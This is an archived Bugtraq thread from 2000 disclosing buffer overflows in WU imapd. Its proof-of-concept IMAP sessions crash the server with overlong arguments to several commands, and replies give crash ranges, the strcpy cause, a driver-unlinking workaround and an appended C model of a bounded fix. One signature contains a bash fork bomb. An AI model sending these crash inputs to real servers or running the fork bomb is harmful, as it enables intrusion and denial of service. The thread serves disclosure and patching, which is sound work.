5013641 2000-04-17  05:11  /41 lines/ Postmaster
Recipient: Bugtraq (import) <10491>
Subject: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-ID:  <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Date:         Sun, 16 Apr 2000 14:19:43 +0200
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id FAA28042

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*sigh*

Privileges seem to be dropped, but, anyway, it's a nice way to get
shell access to a mail account, maybe grab some data from memory etc. I
believe both the imap and ipopd packages need a code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

===========================================================================
The message came from the list <secure@mud.pl>
(5013641) ------------------------------------------(rewrapped)

5017185 2000-04-17  22:43  /88 lines/ Postmaster
Recipient: Bugtraq (import) <10498>
Subject: Re: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Message-ID:  <200004171304.PAA06635@rincewind.msc-media.de>
Date:         Mon, 17 Apr 2000 15:04:41 +0200
Reply-To: Sven Carstens <s.carstens@GMX.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Sven Carstens <s.carstens@GMX.DE>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id WAA10109

On Sun, 16 Apr 2000, Michal Zalewski <lcamtuf@DIONE.IDS.PL> wrote:
> Newest RH:
> 
> * OK nimue IMAP4rev1 v12.264 server ready

This is the imap-4.7 package from the University of Washington.

> 1 login lcamtuf test
> 1 OK LOGIN completed
> 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] 
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> 

To segfault, the number of A's has to be in the range 1023 < #A < 8180.
If the command line including CR/LF is longer than 8192 bytes, an error
message is displayed.

The segfaults are in the nntp, mh, news and dummy drivers.  In all
these modules the subroutine <name>_canonicalize will happily strcpy and
strcat the user-supplied arguments into fixed-size buffers of
normally MAILTMPLEN = 1024 bytes.

Quick workaround:
- remove these modules (if you don't require them) from the linkage
list

To do this, change imapd.c around line 247 and
remove this line:

#include "linkage.c"

and manually add the drivers and authenticators you need:
  mail_link (&mboxdriver);		/* link in the mbox driver */
  mail_link (&imapdriver);		/* link in the imap driver */
/*  mail_link (&nntpdriver);		/* link in the nntp driver */
  mail_link (&pop3driver);		/* link in the pop3 driver */
/*  mail_link (&mhdriver);		/* link in the mh driver */
  mail_link (&mxdriver);		/* link in the mx driver */
  mail_link (&mbxdriver);		/* link in the mbx driver */
  mail_link (&tenexdriver);		/* link in the tenex driver */
  mail_link (&mtxdriver);		/* link in the mtx driver */
  mail_link (&mmdfdriver);		/* link in the mmdf driver */
  mail_link (&unixdriver);		/* link in the unix driver */
/*  mail_link (&newsdriver);		/* link in the news driver */
  mail_link (&philedriver);		/* link in the phile driver */
/*  mail_link (&dummydriver);		/* link in the dummy driver */
  auth_link (&auth_md5);		/* link in the md5 authenticator */
  auth_link (&auth_log);		/* link in the log authenticator */

This list is taken from my default install. You might have extra
authenticators in your configuration. See the file
imap-4.7/c-client/linkage.c
for the drivers of your choice.

It might also be wise to remove all unneeded drivers from the list to
gain speed/security.

There are sure as hell a lot more careless strcpy's inside this code.

BTW: Looking for another library for mail folder access!

> *sigh*
> 
> Privileges seem to be dropped, but, anyway, it's a nice way to get shell
> access to a mail account, maybe grab some data from memory etc. I believe
> both the imap and ipopd packages need a code security audit.
> 

The security audit is really needed for all of the drivers in
c-client.  (Anyone care for a Y2K bug in this?)

CU Sven
(5017185) ------------------------------------------(rewrapped)

5017188 2000-04-17  22:45  /70 lines/ Postmaster
Recipient: Bugtraq (import) <10499>
Subject: Re: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1 
             protocol="application/pgp-signature"; boundary="u3bvv0EcKsvvYeex"
X-Operating-System: Linux 2.2.13 on an i586 LINUX Power!!
X-IRC: FuturE on IRC-Net
X-PGP-Key: http://c0re.phuture.sk/future/kontakt.shtml
Message-ID:  <20000417123800.J2782@phuture.sk>
Date:         Mon, 17 Apr 2000 12:38:00 +0200
Reply-To: Tibor.Pittich@phuture.sk
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Tibor Pittich <Tibor.Pittich@phuture.sk>
Organization: Computer Centre CHTF STU Bratislava
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>


On 16 Apr 2000 at 14:19, Michal Zalewski wrote:
> * OK nimue IMAP4rev1 v12.264 server ready
> 1 login lcamtuf test
> 1 OK LOGIN completed
> 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()

The older version, imap-4.5-4, seems to be OK:

* OK localhost IMAP4rev1 v12.250 server ready
1 login test test
1 OK LOGIN completed
1 list "" 'lot of AAAAA....'
1 OK LIST completed

and in imap-4.6-3 too:
* OK localhost IMAP4rev1 v12.252 server ready
1 login future test
1 OK LOGIN completed
1 list "" 'lot of AAAA......'
1 OK LIST completed

I think this is a new "feature" coming from the University of Washington ;)

Best regards
--
+------------------------+------------------------------------------------+
+ Tibor "FuturE" Pittich | Email       : Tibor.Pittich@phuture.sk
+------------------------+ HomePage    : http://c0re.phuture.sk/future
          PGPkey v5.0i: pgpk -a finger://c0re.phuture.sk/future
+-------------------------> write to me in ISO-8859-2 <-----------------------+

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.0 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE4+umIjtVzQtYTy78RAqgTAJ9Wirak6tDim9svZAWw8xweb58ZJgCgjzLX
gIJ7mszVwR721a4uquJ+wjs=
=NmH2
-----END PGP SIGNATURE-----

(5017188) ------------------------------------------

5029757 2000-04-21  20:19  /42 lines/ Postmaster
Recipient: Bugtraq (import) <10564>
Subject: another WU imapd buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Organization: Is it really so important?
Message-ID:  <20000421021218.A693@clico.pl>
Date:         Fri, 21 Apr 2000 02:12:18 +0200
Reply-To: Michal Szymanski <siva9@CLICO.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Szymanski <siva9@CLICO.PL>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

While doing a code security audit, I discovered another buffer overflow
in imapd.  This time the security flaw exists in the standard RFC 1064 COPY
command:

* OK mail IMAP4rev1 v12.264 server ready
login siva9 secret
OK LOGIN completed
select inbox
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 956162550] UID validity status
* OK [UIDNEXT 5] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent flags
* OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
OK [READ-WRITE] SELECT completed
copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

No answer. The process has been killed by SIGSEGV. The number of A's must be
in the range from 1017 to 8180. After LOGIN all privileges are dropped,
but we still have the possibility to get unprivileged shell access. I've
tested it against WU imapd v10.223, v11.241, v12.250, v12.261, and
v12.264.

Regards,

Michal Szymanski [michal_szymanski@linux.com.pl];
(5029757) ------------------------------------------(rewrapped)

X-Organization: Is it really so important?
Message-ID:  <20000422002433.A5056@clico.pl>
Date:         Sat, 22 Apr 2000 00:24:33 +0200
Reply-To: Michal Szymanski <siva9@CLICO.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Szymanski <siva9@CLICO.PL>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Hi again,

imapd seems to be very weak. I've found another three buffer overruns.
This time the affected commands are LSUB, RENAME and FIND:


* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in authenticated state -
where the second argument is a string - are vulnerable.  I'm not sure, but
ipop2/3d works fine in all states, also in transaction state. Mark,
am I right?

Regards,

Michal Szymanski [michal_szymanski@linux.com.pl];
(5030541) ------------------------------------------(rewrapped)
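As an added illustration, not code from the imap-4.7 tree or from anyone in this thread, the following C model ties together the two limits the thread describes: Sven Carstens's observation that the <driver>_canonicalize routines strcpy/strcat a user-supplied mailbox name into a fixed MAILTMPLEN (1024-byte) buffer, and the 8192-byte line limit that makes imapd reject longer commands before any driver runs. Together those bound the argument lengths Michal Szymanski reports for COPY, LSUB, RENAME and FIND. The driver prefix length and the per-command line overhead are parameters here, because the exact prefix each driver prepends is not shown on the page; every function name, the IMAP_MAX_LINE constant and the sample inputs are assumptions for illustration, and the "unsafe" check only computes the length the strcpy/strcat pattern would write instead of performing the overflow.

```c
/* Added example, not part of c-client or imapd.  Models the fixed-buffer
 * canonicalize pattern from the thread and a bounded replacement.
 * Names other than MAILTMPLEN are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAILTMPLEN 1024      /* c-client's temporary-buffer size, as named in the thread */
#define IMAP_MAX_LINE 8192   /* assumed: line length beyond which imapd answers with an error */

/* Bytes the unsafe pattern  strcpy(tmp, prefix); strcat(tmp, name);  would
 * write into tmp, NUL included.  Returns 1 when that exceeds MAILTMPLEN,
 * i.e. when the copy would run past the fixed-size buffer.  Computed, not
 * performed, so this function is safe to call on any input. */
int unsafe_copy_would_overflow(const char *prefix, const char *name)
{
    size_t need = strlen(prefix) + strlen(name) + 1;
    return need > MAILTMPLEN;
}

/* Hardened replacement: an explicit length check before anything is
 * written, then bounded formatting.  Returns 0 and leaves dst empty on
 * overlong input rather than truncating silently, so a caller never
 * operates on a mangled mailbox name. */
int safe_canonicalize(char *dst, size_t dstlen, const char *prefix, const char *name)
{
    int n;
    if (dstlen == 0) return 0;
    dst[0] = '\0';
    if (strlen(prefix) + strlen(name) + 1 > dstlen) return 0;  /* reject, do not truncate */
    n = snprintf(dst, dstlen, "%s%s", prefix, name);
    return n >= 0 && (size_t)n < dstlen;
}

/* The crash window for an argument of n bytes: the copy overflows once
 * prefix_len + n + 1 > MAILTMPLEN, and the whole line (tag, command, other
 * arguments, CRLF) must still fit in IMAP_MAX_LINE or the server rejects
 * it before any driver is reached.  line_overhead is every byte on the
 * line except the argument itself. */
void crash_window(size_t prefix_len, size_t line_overhead, size_t *lo, size_t *hi)
{
    *lo = MAILTMPLEN - prefix_len;        /* smallest n that overflows the buffer */
    *hi = IMAP_MAX_LINE - line_overhead;  /* largest n still accepted as a line */
}

int main(void)
{
    char tmp[MAILTMPLEN];
    char *name = malloc(1100 + 1);
    size_t lo, hi;

    if (!name) return 1;
    memset(name, 'A', 1100);              /* constructed input: 1100 'A's */
    name[1100] = '\0';
    printf("1100 A's: unsafe pattern overflows=%d, safe_canonicalize accepts=%d\n",
           unsafe_copy_would_overflow("", name),
           safe_canonicalize(tmp, sizeof tmp, "", name));

    /* '1 list "" ' is 10 bytes and CRLF is 2, so overhead 12 and no driver prefix. */
    crash_window(0, 12, &lo, &hi);
    printf("LIST window: %zu <= #A <= %zu\n", lo, hi);
    free(name);
    return 0;
}
```

For LIST with an empty driver prefix, `1 list "" ` plus CRLF is 12 bytes, which yields exactly the 1023 < #A <= 8180 window Sven posted; the other commands in the thread shift the lower bound by whatever prefix their driver prepends and the upper bound by the command's own overhead on the line, which is why the reported ranges differ by a few bytes per command. The hardened routine rejects rather than truncates, because a silently truncated mailbox path is itself a classic source of follow-on bugs.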